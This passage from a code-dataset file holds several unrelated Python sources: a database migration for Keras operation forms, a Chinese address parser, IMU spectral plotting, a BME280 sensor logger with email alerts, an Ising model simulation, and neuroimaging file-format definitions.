'pt', 'Execução'),\n (5174, 'en', 'Execution'),\n (5174, 'pt', 'Execução'),\n (5175, 'en', 'Execution'),\n (5175, 'pt', 'Execução'),\n (5176, 'en', 'Execution'),\n (5176, 'pt', 'Execução'),\n (5177, 'en', 'Execution'),\n (5177, 'pt', 'Execução'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_operation_form():\n tb = table(\n 'operation_operation_form',\n column('operation_id', Integer),\n column('operation_form_id', Integer))\n\n columns = ('operation_id', 'operation_form_id')\n data = [\n #Input\n (5071, 5171), # own execution form\n (5071, 5172), # own execution form\n (5071, 5173), # own execution form\n (5071, 5174), # own execution form\n (5071, 5175), # own execution form\n (5071, 5176), # own execution form\n (5071, 5177), # own execution form\n (5071, 41), #appearance\n (5072, 41), #appearance\n ]\n\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form_field():\n tb = table(\n 'operation_form_field',\n column('id', Integer),\n column('name', String),\n column('type', String),\n column('required', Integer),\n column('order', Integer),\n column('default', Text),\n column('suggested_widget', String),\n column('values_url', String),\n column('values', String),\n column('scope', String),\n column('form_id', Integer), )\n\n columns = ('id', 'name', 'type', 'required', 'order', 'default',\n 'suggested_widget', 'values_url', 'values', 'scope', 'form_id')\n data = [\n #Dataset\n (5171, 'dataset', 'TEXT', 1, 1, None, 'text', None, None, 'EXECUTION', 5171),\n #Train/Validation/test split\n (5172, 'train_validation_test_split', 'TEXT', 0, 2, '60%-20%-20%', 'text', None, None, 'EXECUTION', 5172),\n #K-fold cross validation\n (5173, 'use_k_fold_cross_validation', 'INTEGER', 0, 3, None, 'checkbox', None, None, 'EXECUTION', 5173),\n #Train/Validation/test split\n (5174, 'percent_of_train_data', 'INTEGER', 0, 4, None, 'integer', None, None, 'EXECUTION', 5174),\n #Shuffle data\n (5175, 'shuffle_data', 'INTEGER', 0, 5, None, 'checkbox', None, None, 'EXECUTION', 5175),\n (5176, 'load_dataset_in_memory', 'TEXT', 0, 6, 'one batch at a time', 'dropdown', None,\n json.dumps([\n {\"key\": \"one batch at a time\", \"value\": \"one batch at a time\"},\n {\"key\": \"full dataset\", \"value\": \"full dataset\"},\n ]),\n 'EXECUTION', 5176),\n (5177, 'seed', 'INTEGER', 0, 7, 17, 'integer', None, None, 'EXECUTION', 5177),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form_field_translation():\n tb = table(\n 'operation_form_field_translation',\n column('id', Integer),\n column('locale', String),\n column('label', String),\n column('help', String), )\n\n columns = ('id', 'locale', 'label', 'help')\n data = [\n (5171, 'en', 'Dataset', 'Path for the dataset.'),\n (5172, 'en', 'Train-Validation-Test split', 'Percentage for Train, '\n 'Validation and Test to split the data automatically. '\n 'The sum of them needs to be equal to 100.'),\n (5173, 'en', 'Use K-fold cross validation', 'The dataset will be split in different k-fold train and test.'),\n (5174, 'en', '% of train data', 'Percentage of training data to compose '\n 'the each fold for the cross validation. '\n 'The test data is 100 - (% of train).'),\n (5175, 'en', 'Shuffle data', 'Shuffle the instances in the dataset to ensure a random learning space.'),\n (5176, 'en', 'Load dataset in memory', 'Load the dataset in memory in two ways. 
'\n '1- Full dataset in memory (recommended for small dataset). '\n '2- One batch at time (recommended for large dataset).'),\n (5177, 'en', 'Seed', 'Fix random seed for reproducibility.'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\nall_commands = [\n (_insert_operation,\n 'DELETE FROM operation WHERE id BETWEEN 5071 AND 5072'),\n (_insert_operation_category,\n 'DELETE FROM operation_category WHERE id BETWEEN 5070 AND 5072'),\n (_insert_operation_translation,\n 'DELETE FROM operation_translation WHERE id BETWEEN 5071 AND 5072'),\n (_insert_operation_category_operation,\n 'DELETE FROM operation_category_operation WHERE operation_id BETWEEN 5071 AND 5072'),\n (_insert_operation_category_translation,\n 'DELETE FROM operation_category_translation WHERE id = 5070'),\n (_insert_operation_platform,\n 'DELETE FROM operation_platform WHERE operation_id BETWEEN 5071 AND 5072 AND platform_id = {}'.format(KERAS_PLATAFORM_ID)),\n\n # Port and interfaces\n (_insert_operation_port,\n 'DELETE FROM operation_port WHERE id IN (5172, 5271)'),\n (_insert_operation_port_interface_operation_port,\n 'DELETE FROM operation_port_interface_operation_port WHERE operation_port_id IN (5172, 5271)'),\n (_insert_operation_port_translation,\n 'DELETE FROM operation_port_translation WHERE id IN (5172, 5271)'),\n\n # Forms\n (_insert_operation_form,\n 'DELETE FROM operation_form WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_field,\n 'DELETE FROM operation_form_field WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_translation,\n 'DELETE FROM operation_form_translation WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_field_translation,\n 'DELETE FROM operation_form_field_translation WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_operation_form,\n 'DELETE FROM operation_operation_form WHERE operation_id IN (5071, 5072)'),\n]\n\n\ndef upgrade():\n ctx = context.get_context()\n session = sessionmaker(bind=ctx.bind)()\n connection = session.connection()\n\n try:\n for cmd in all_commands:\n if isinstance(cmd[0], str):\n connection.execute(cmd[0])\n elif isinstance(cmd[0], list):\n for row in cmd[0]:\n connection.execute(row)\n else:\n cmd[0]()\n except:\n session.rollback()\n raise\n session.commit()\n\n\ndef downgrade():\n ctx = context.get_context()\n session = sessionmaker(bind=ctx.bind)()\n connection = session.connection()\n\n try:\n connection.execute('SET foreign_key_checks = 0;')\n for cmd in reversed(all_commands):\n if isinstance(cmd[1], str):\n connection.execute(cmd[1])\n elif isinstance(cmd[1], list):\n for row in cmd[1]:\n connection.execute(row)\n else:\n cmd[1]()\n connection.execute('SET foreign_key_checks = 1;')\n except:\n session.rollback()\n raise\n session.commit()\n\n","sub_path":"migrations/versions/8647edf5eaad_add_keras_input_and_output_layers.py","file_name":"8647edf5eaad_add_keras_input_and_output_layers.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"455289561","text":"# coding=utf-8\nimport re\nimport json\nimport os\nimport openpyxl\n#五级地址解析库 ,返回前四级地址\n\nabbrProvinces=[\n '北京','天津','河北','山西','内蒙古','辽宁','吉林','黑龙江','上海','江苏',\n '浙江','安徽','福建','江西','山东','河南','湖北','湖南','广东','广西',\n '海南','重庆','四川','贵州','云南','西藏','陕西','甘肃','青海','宁夏','新疆'\n]\n#省全拼\nallProvinces=[\n '北京','天津','河北省','山西省','内蒙古自治区','辽宁省','吉林省','黑龙江省','上海','江苏省',\n '浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','广西壮族自治区',\n 
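# NB: this list must stay index-aligned with abbrProvinces, since lookups use .index() across the two\n    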
'海南省','重庆','四川省','贵州省','云南省','西藏自治区','陕西省','甘肃省','青海省','宁夏回族自治区','新疆维吾尔自治区'\n]\nclass Load():\n    def __init__(self):\n\n        self.provinces={}\n        self.cities={}\n        self.countries={}\n        self.towns={}\n        self.loadXlsx()\n    def loadXlsx(self):\n        proPath='./省.xlsx'\n        cityPath='./市.xlsx'\n        countyPath='./县.xlsx'\n        townPath='./乡.xlsx'\n        wb=openpyxl.load_workbook(proPath)\n        sheet=wb['Sheet1']\n        for row in sheet.rows:\n            self.provinces[row[1].value]=row[0].value\n            self.provinces[row[0].value]=row[1].value\n        wb = openpyxl.load_workbook(cityPath)\n        sheet = wb['Sheet1']\n        for row in sheet.rows:\n            dic = {}\n            dic['city'] = row[0].value\n            dic['province_id']=row[2].value\n            self.cities[row[1].value] = dic\n\n            dic['city_id']=row[1].value\n            dic['province_id'] = row[2].value\n            self.cities[row[0].value]=dic\n\n        wb = openpyxl.load_workbook(countyPath)\n        sheet = wb['Sheet1']\n        for row in sheet.rows:\n            dic={}\n            dic['country']=row[0].value\n            dic['city_id']=row[2].value\n            self.countries[row[1].value] =dic\n\n            dic['country_id'] = row[1].value\n            dic['city_id'] = row[2].value\n            self.countries[row[0].value] = dic\n\n        wb = openpyxl.load_workbook(townPath)\n        sheet = wb['Sheet1']\n        for row in sheet.rows:\n            dic={}\n            dic['town']=row[0].value\n            dic['city_id']=row[2].value\n            self.towns[row[1].value] = dic\n\n            dic['town_id'] = row[1].value\n            dic['city_id'] = row[2].value\n            self.towns[row[0].value] = dic\n\n    def parse(self,addr):\n        provinces,cities,countries,towns=self.provinces,self.cities,self.countries,self.towns\n        #找出省\n        #print(provinces,cities,countries,towns)\n        dic={\n            'province':'',\n            'city':'',\n            'country':'',\n            'town':'',\n            'detail':'',\n        }\n        for i in abbrProvinces:\n            if i in addr and ( addr.find(i)==0):#保证第一个省正确\n                dic['province']=allProvinces[abbrProvinces.index(i)]\n                if dic['province'] in ['北京','天津','上海','重庆']:\n                    dic['city']=dic['province']+'市'\n                break\n        if dic['province']=='':\n            for i in cities:\n                if cities[i]['city'] in addr or cities[i]['city'][:-1] in addr:\n                    dic['province']=provinces[cities[i]['city_id'][:2]+10*'0']\n                    break\n        if dic['province']=='':\n            for i in countries:\n                if countries[i]['country'] in addr:\n                    dic['province']=provinces[countries[i]['country_id'][:2]+10*'0']\n                    break\n        if dic['province'] == '':\n            for i in towns:\n                if towns[i]['town'] in addr:\n                    dic['province']=provinces[towns[i]['town_id'][:2]+10*'0']\n                    break\n        #print(dic['province'])\n        province_id = provinces[dic['province']]\n        if dic['province']:\n            if (dic['province'][-1] == '省') or (dic['province'] in ['北京', '天津', '重庆', '上海']):\n                if dic['province'] in ['北京', '天津', '重庆', '上海']:\n                    # match=re.match(dic['province'],addr)\n                    dic['city']=dic['province']+'市'\n                    span = addr.find(dic['province']) + len(dic['province'])\n                    if addr[span] == '市':\n                        addr = addr.replace(dic['city'], '', 1)\n                    else:\n                        addr = addr.replace(dic['province'], '', 1)\n                else:\n                    span = addr.find(abbrProvinces[allProvinces.index(dic['province'])]) + len(\n                        abbrProvinces[allProvinces.index(dic['province'])])\n                    # print(match.span())\n                    if addr[span] == '省':\n                        addr = addr.replace(dic['province'], '', 1)\n                    else: # 后面没有省\n                        addr = addr.replace(dic['province'][:-1], '', 1)\n            else:\n                addr = addr.replace(dic['province'], '', 1)\n\n\n        if dic['city'] == '':\n            for i in cities:\n                if i[:2]==province_id[:2]:#保证分词正确\n                    if (cities[i]['city'] in addr) and addr.find(cities[i]['city']) ==0:\n                        dic['city']=cities[i]['city']\n                    if ((cities[i]['city'][:-1]) in addr ) and ( addr.find(cities[i]['city'][:-1])==0):\n                        dic['city']=cities[i]['city']\n\n        #找到县\n        if dic['city']:\n            if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and 
(dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n\n for i in countries:\n #print(countries[i])\n if (countries[i]['country'] in addr) and (province_id[:2]==countries[i]['country_id'][:2]) :\n if addr.find(countries[i]['country'])==0:\n dic['country'] = countries[i]['country']\n addr=addr.replace(dic['country'],'',1)\n if dic['city']=='' :\n if i[:4]+8*'0' in cities:\n dic['city']=cities[i[:4]+8*'0']['city']\n break\n if dic['city']:\n if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and (dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n for i in towns:\n #print(towns[i])\n if (re.findall(towns[i]['town'],addr) ) and (province_id[:2]==towns[i]['town_id'][:2]):\n if addr.find(towns[i]['town'])==0:\n #print(towns[i]['town'])\n dic['town']=towns[i]['town']\n addr=addr.replace(dic['town'],'',1)\n if dic['city']=='':\n if i[:4]+8*'0' in cities:\n dic['city']=cities[i[:4]+8*'0']['city']\n if dic['country']=='':\n if i[:7]+5*'0' in countries:\n dic['country'] = countries[i[:7] + 5 * '0']['country']\n break\n\n if dic['city']:\n if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and (dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n\n # addr = addr.replace(dic['town'], '', 1)\n # addr = addr.replace(dic['country'], '', 1)\n dic['detail'] = addr\n #print(dic)\n return dic\n\n def parse2(self,addr,dic):\n provinces, cities, countries, towns = self.provinces, self.cities, self.countries, self.towns\n # 找出省\n # print(provinces,cities,countries,towns)\n #先匹配省\n if dic['province']:\n if dic['province'][-1] =='省':\n if (dic['province'] in addr) and (addr.find(dic['province'])==0):\n addr=addr.replace(dic['province'],'',1)\n elif (dic['province'][:-1] in addr) and (addr.find(dic['province'][0:-1])==0):\n addr = addr.replace(dic['province'][:-1], '', 1)\n else:\n dic['province']=''\n elif dic['province'] in ['北京','天津','重庆','上海']:\n if (dic['province']+'市' in addr) and (addr.find(dic['province']+'市') == 0):\n pass\n else:#后缀不是省市\n if (dic['province'] in addr) and (addr.find(dic['province'])==0):\n addr=addr.replace(dic['province'],'',1)\n else:\n dic['province']=''\n if dic['city']:\n if dic['city'][-1]=='市':\n if dic['city'] in addr and (addr.find(dic['city'])==0):\n addr = addr.replace(dic['city'], '', 1)\n elif (dic['city'][:-1] in addr) and (addr.find(dic['city'][:-1])==0):\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n dic['city']=''\n else:\n if dic['city'] in addr and (addr.find(dic['city']) == 0):\n addr = addr.replace(dic['city'], '', 1)\n else:\n dic['city']=''\n if dic['country']:\n if dic['country'] in addr and (addr.find(dic['country']) == 0):\n addr = addr.replace(dic['country'], '', 1)\n else:\n dic['country'] = ''\n if dic['town']:\n if dic['town'] in addr and (addr.find(dic['town'])==0):\n addr = addr.replace(dic['town'], '', 1)\n else:\n dic['town']=''\n dic['detail']=addr\n #print('dic',dic)\n return dic\n\n\nif __name__=='__main__':\n 
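# sample address for manual testing; the module only defines it and never parses it\n    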
x='北京市东城区交道口东大街1号北京市东城区人民法院'\n","sub_path":"041702324/parseAddr.py","file_name":"parseAddr.py","file_ext":"py","file_size_in_byte":10696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318215636","text":"# processes useful csv and visualizes the spectral analysis\n# Important: csv data is assumed to be in Nx7 format with columns:\n# time | lat_accel | long_accel | vert_accel | x_angular_vel| y_angular_vel | z_angular_vel\n# TODO: Add a prompt for user to input file name of generated csv files\n# and/or use both preprocess and data_vis in collective main\n\nimport csv\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom tkinter.filedialog import askopenfilename\n\n\ndef cal_single_sided_power(Y):\n    # calculate raw power spectrum\n    n = len(Y)\n    P2 = np.power(np.absolute(Y), 2) / n\n    P1 = P2[0:int((n / 2 + 1))]\n    P1[1:-1] = 2 * P1[1:-1]\n    return P1\n\n\ndef plot_fft_imu_comparison(fft1, fft2, fft3, str, y_lim, fig):\n    fs = 100 # sampling frequency\n\n    n = len(fft1)\n    f = fs*(np.arange(0, n)) / n / 2 # n-1?\n    plt.figure(fig)\n    plt.subplot(311)\n    plt.plot(f, fft1)\n    plt.legend(['Nike'])\n    plt.title(str)\n    plt.ylim((0,y_lim))\n\n    plt.subplot(312)\n    n = len(fft2)\n    f = fs * (np.arange(0, n)) / n / 2\n    plt.plot(f, fft2)\n    plt.ylabel('Power = Magnitude^2')\n    plt.legend(['Odin'])\n    plt.ylim((0,y_lim))\n\n    plt.subplot(313)\n    n = len(fft3)\n    f = fs * (np.arange(0, n)) / n / 2\n    plt.plot(f, fft3)\n    plt.xlabel('Frequency (Hz)')\n    plt.legend([\"Lewis\"])\n    plt.ylim((0,y_lim))\n\n    plt.show()\n\n# plot histogram of IMU force distribution for all readings\ndef plot_histogram():\n    x = 0\n\n\ndef spectral_analysis(data_name):\n    # opens csv and returns an array containing fft results of the fft sensor readings\n    with open(data_name) as csv_file:\n        csv_reader = csv.reader(csv_file, delimiter=',')\n\n        data = list(csv_reader)\n        row_count = len(data)\n\n        csv_file.seek(0) # reset iterator to beginning\n\n        time_raw = np.zeros(row_count)\n        long_accel_raw = np.zeros(row_count)\n        lat_accel_raw = np.zeros(row_count)\n        vert_accel_raw = np.zeros(row_count)\n        angvel_x_raw = np.zeros(row_count) #roll\n        angvel_y_raw = np.zeros(row_count) #pitch\n        angvel_z_raw = np.zeros(row_count) #yaw\n\n        iteration = 0\n\n        for row in csv_reader:\n            time_raw[iteration] = row[0]\n            long_accel_raw[iteration] = row[2]\n            lat_accel_raw[iteration] = row[1]\n            vert_accel_raw[iteration] = row[3]\n            angvel_x_raw[iteration] = row[4]\n            angvel_y_raw[iteration] = row[5]\n            angvel_z_raw[iteration] = row[6]\n\n            iteration+=1\n            print(iteration)\n\n    print(time_raw)\n    # get fft results\n    long_accel_fft = scipy.fft(long_accel_raw)\n    lat_accel_fft = scipy.fft(lat_accel_raw)\n    vert_accel_fft = scipy.fft(vert_accel_raw)\n    angvel_x_fft = scipy.fft(angvel_x_raw)\n    angvel_y_fft = scipy.fft(angvel_y_raw)\n    angvel_z_fft = scipy.fft(angvel_z_raw)\n\n    # calculate raw power spectrum\n    long_accel_fftpower = cal_single_sided_power(long_accel_fft)\n    lat_accel_fftpower = cal_single_sided_power(lat_accel_fft)\n    vert_accel_fftpower = cal_single_sided_power(vert_accel_fft)\n    angvel_x_fftpower = cal_single_sided_power(angvel_x_fft)\n    angvel_y_fftpower = cal_single_sided_power(angvel_y_fft)\n    angvel_z_fftpower = cal_single_sided_power(angvel_z_fft)\n\n    comb_array = [long_accel_fftpower, lat_accel_fftpower, vert_accel_fftpower,\n                  angvel_x_fftpower, angvel_y_fftpower, angvel_z_fftpower]\n\n    return comb_array\n\n\nif __name__ == '__main__':\n    lewis_fftpower = spectral_analysis(\"imu_stack_lewis.csv\")\n    atlas_fftpower 
= spectral_analysis(\"post_processed_data_test.csv\")\n nike_fftpower = spectral_analysis(\"imu_stack_nike.csv\")\n odin_fftpower = spectral_analysis(\"imu_stack_odin.csv\")\n\n # plot results\n # longitudinal acceleration power comparison\n plot_fft_imu_comparison(nike_fftpower[0], odin_fftpower[0], lewis_fftpower[0], \"Longitudinal Acceleration\", 50, 1)\n plot_fft_imu_comparison(nike_fftpower[1], odin_fftpower[1], lewis_fftpower[1], \"Lateral Acceleration\", 100, 2)\n plot_fft_imu_comparison(nike_fftpower[2], odin_fftpower[2], lewis_fftpower[2], \"Vertical Acceleration\", 100, 3)\n plot_fft_imu_comparison(nike_fftpower[3], odin_fftpower[3], lewis_fftpower[3], \"Angular Velocity_x (Roll)\", 0.3, 4)\n plot_fft_imu_comparison(nike_fftpower[4], odin_fftpower[4], lewis_fftpower[4], \"Angular Velocity_y (Pitch)\", 0.5, 5)\n plot_fft_imu_comparison(nike_fftpower[5], odin_fftpower[5], lewis_fftpower[5], \"Angular Velocity_z (Yaw)\", 1, 6)\n\n plot_histogram()\n","sub_path":"python_code/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165437572","text":"\n\nimport time\nimport json\nimport board\nimport busio\nimport adafruit_bme280\nimport csv\nimport datetime\nimport smtplib\nimport json\nimport datetime\n\ndef mail_alert1(): \n fromaddr = email\n toaddrs = email\n msg = 'Subject: {}\\n\\n{}'.format('Indoor Unit ' + sensorParameters['ID'] + ' ' +'BME280 error', 'Sensor' + '_' + sensorParameters['ID'] + ' BME280 error ' + currentTime.strftime('%Y%m%d_%H%M%S'))\n\n# Credentials (if needed)\n username = email\n password = pw\n\n# The actual mail send\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, msg)\n server.quit()\n\ndef mail_alert2(): \n fromaddr = email\n toaddrs = email_2\n msg = 'Subject: {}\\n\\n{}'.format('Indoor Unit ' + sensorParameters['ID'] + ' ' +'BME280 error', 'Sensor' + '_' + sensorParameters['ID'] + ' BME280 error at ' + currentTime.strftime('%Y%m%d_%H%M%S'))\n\n# Credentials (if needed)\n username = email\n password = pw\n\n# The actual mail send\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, msg)\n server.quit()\n\n\n\nwith open('sensorParameters.json') as json_file:\n sensorParameters=json.load(json_file)\n\nwith open('/home/pi/SpokaneSchools/software/Name_1.txt','r') as file:\n email=file.read()\n \nwith open('/home/pi/SpokaneSchools/software/Name_3.txt','r') as file:\n email_2=file.read()\n\nwith open('/home/pi/SpokaneSchools/software/Name_2.txt','r') as file:\n pw=file.read()\n \n\n\n# Create library object using our Bus I2C port\ni2c = busio.I2C(board.SCL, board.SDA)\nbme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n\n\n# change this to match the location's pressure (hPa) at sea level\nbme280.sea_level_pressure = 1013.25\n\n#Once JSON file is created, open the file to read in sensorParameters\nwith open('/home/pi/SpokaneSchools/Cloud/sensorParameters.json') as json_file:\n sensorParameters=json.load(json_file)\n\n# Create a unique filename for the current date.\ncurrentHour = datetime.datetime.now().hour\ncurrentTime = datetime.datetime.now()\ncurrentDate = currentTime.date()\nfilename = 'BME_' + sensorParameters['name'] + '_' + sensorParameters['ID'] + '_' +currentTime.strftime('%Y%m%d_%H%M%S') + '.csv'\n\n### Initialize variables to store 
data in CSV file.\ndata_file = []\n\n\nwith open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'w') as f:\n writer = csv.DictWriter(f, fieldnames = [\"Datetime\",\"temp\", \"P\", \"RH\"])\n writer.writeheader()\n #init_headers.to_csv(f, header=True)\n f.close()\n\n\nwhile True:\n try:\n if (datetime.datetime.now().date() != currentDate):\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'a') as f:\n wr = csv.writer(f, delimiter = ',')\n wr.writerows(data_file)\n f.close()\n currentHour = datetime.datetime.now().hour\n currentTime = datetime.datetime.now()\n currentDate = currentTime.date()\n data_file = []\n\n filename = 'BME_' + sensorParameters['name'] + '_' + sensorParameters['ID'] + '_' +currentTime.strftime('%Y%m%d_%H%M%S') + '.csv'\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'w') as f:\n writer = csv.DictWriter(f, fieldnames = ['Datetime', 'temp', 'P', 'RH'])\n writer.writeheader()\n f.close()\n\n if datetime.datetime.now().hour != currentHour:\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'a') as f:\n wr = csv.writer(f, delimiter = ',')\n wr.writerows(data_file)\n f.close()\n currentHour = datetime.datetime.now().hour\n data_file = []\n \n # create error to see if email is sent (comment out after confirming function)\n #error = unknown_variable\n data_line = [datetime.datetime.now().isoformat(), bme280.temperature, bme280.pressure, bme280.humidity]\n data_file.append(data_line)\n print(data_line)\n print(\"\\nTemperature: %0.1f C\" % bme280.temperature)\n print(\"Humidity: %0.1f %%\" % bme280.humidity)\n print(\"Pressure: %0.1f hPa\" % bme280.pressure)\n print(\"Altitude = %0.2f meters\" % bme280.altitude)\n time.sleep(120)\n \n except Exception:\n currentTime = datetime.datetime.now()\n\n mail_alert1()\n #mail_alert2()\n time.sleep(3600)\n\n","sub_path":"python/monitoring/bme280.py","file_name":"bme280.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"503064148","text":"#Tarea 3- Mecanica Estadistica - modelo de Ising\nimport numpy as np\nimport numpy.random as rand\nimport matplotlib.pyplot as plt\n\n#%%% Calculo de energia\ndef Estado(i,j):\n A[i,j] = -A[i,j] # Cambio de estado de un espin\n \ndef Energia(): # Energia total de la red\n E_T = 0\n for i in range(N):\n for j in range(N):\n E_T += -A[i,j]*(A[(i+1)%N,j]+ A[(i-1)%N,j]+A[i,(j+1)%N]+A[i,(j-1)%N])\n # calculo de la energia de interaccion y sumado\n return E_T\ndef Magnetizacion():\n return np.sum(A)/N**2 # Calculo magnetizacion\n \ndef Metstep(alpha): # Algoritmo metropolis\n for k in range(N**2):\n i = rand.randint(N) # Seleccion de espin a la azar\n j = rand.randint(N)\n dE = 2*A[i,j]*(A[(i+1)%N,j]+ A[(i-1)%N,j]+A[i,(j+1)%N]+A[i,(j-1)%N])\n # Cambio de energia\n if (dE <=0 or np.exp(-alpha*dE)> rand.rand()):\n Estado(i,j) # Cambiar de estado\ndef CalculoVariables(alpha,A,mcsteps):\n # simulacion\n t = np.linspace(1,mcsteps,mcsteps)\n E = [] # Energia\n M = [] # Magnetizacion\n for i in range(mcsteps):\n Metstep(alpha) # Paso\n E.append(Energia())\n M.append(Magnetizacion())\n return (t,E,M)\n#%%\nT_f = np.array([1/4,1/2,3/4,7/8,15/16,17/16,9/8,5/4,3/2,7/4])\n# Temperaturas\nalpha_c = 0.44069 # Definido en el informe\n#Critico\nalpha = alpha_c/T_f\n#%%\nN = 40\nEE = []\nMM = []\nfor l in range(len(T_f)):\n rand.seed(6)\n A_0 = np.ones([N,N])\n A = A_0 + 2*rand.randint(-1,1,(N,N))\n # Inicializacion de la matriz de espines\n (t,E,M) = 
CalculoVariables(alpha[l],A,10000)\n EE.append(np.mean(E[2000:]))\n MM.append(np.mean(M[2000:]))\n\n#%% Graficas \nplt.figure()\nplt.scatter(T_f,np.abs(MM))\nplt.xlabel('T/Tc')\nplt.ylabel('M/N')\nplt.savefig('Mac.jpg') \n#%%\nplt.figure()\nplt.scatter(T_f,EE)\nplt.xlabel('T/Tc')\nplt.ylabel('E/JN')\nplt.savefig('Ener.jpg') \n \n","sub_path":"Ising.py","file_name":"Ising.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387793885","text":"from copy import deepcopy, copy\nfrom arcana.node import Node\nfrom arcana.file_format import FileFormat, Converter\nfrom nianalysis.interfaces.mrtrix import MRConvert\nfrom nianalysis.requirement import (\n dcm2niix_req, mrtrix3_req)\nfrom nianalysis.interfaces.converters import Dcm2niix\nfrom arcana.file_format import (\n text_format, directory_format, zip_format, targz_format) # @UnusedImport\n\n\nclass Dcm2niixConverter(Converter):\n\n requirements = [dcm2niix_req]\n\n def get_node(self, name):\n convert_node = Node(Dcm2niix(), name=name,\n requirements=self.requirements,\n wall_time=20)\n convert_node.inputs.compression = 'y'\n return convert_node, 'input_dir', 'converted'\n\n\nclass MrtrixConverter(Converter):\n\n requirements = [mrtrix3_req]\n\n def get_node(self, name):\n convert_node = Node(MRConvert(), name=name,\n requirements=self.requirements)\n convert_node.inputs.out_ext = self._output_format.extension\n convert_node.inputs.quiet = True\n return convert_node, 'in_file', 'out_file'\n\n\n# =====================================================================\n# All Data Formats\n# =====================================================================\n\n\n# NeuroImaging data formats\ndicom_format = FileFormat(name='dicom', extension=None,\n directory=True, within_dir_exts=['.dcm'],\n alternate_names=['secondary'])\nnifti_format = FileFormat(name='nifti', extension='.nii',\n converters={'dicom': Dcm2niixConverter,\n 'analyze': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nnifti_gz_format = FileFormat(name='nifti_gz', extension='.nii.gz',\n converters={'dicom': Dcm2niixConverter,\n 'nifti': MrtrixConverter,\n 'analyze': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nanalyze_format = FileFormat(name='analyze', extension='.img',\n converters={'dicom': MrtrixConverter,\n 'nifti': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nmrtrix_format = FileFormat(name='mrtrix', extension='.mif',\n converters={'dicom': MrtrixConverter,\n 'nifti': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'analyze': MrtrixConverter})\n\n# Tabular formats\nrfile_format = FileFormat(name='rdata', extension='.RData')\n# matlab_format = FileFormat(name='matlab', extension='.mat')\ncsv_format = FileFormat(name='comma-separated_file', extension='.csv')\ntext_matrix_format = FileFormat(name='text_matrix', extension='.mat')\n\n# Diffusion gradient-table data formats\nfsl_bvecs_format = FileFormat(name='fsl_bvecs', extension='.bvec')\nfsl_bvals_format = FileFormat(name='fsl_bvals', extension='.bval')\nmrtrix_grad_format = FileFormat(name='mrtrix_grad', extension='.b')\n\n# Tool-specific formats\neddy_par_format = FileFormat(name='eddy_par',\n extension='.eddy_parameters')\nfreesurfer_recon_all_format = FileFormat(name='fs_recon_all',\n directory=True)\nica_format = FileFormat(name='ica', extension='.ica', directory=True)\npar_format = FileFormat(name='parameters', extension='.par')\nmotion_mats_format = 
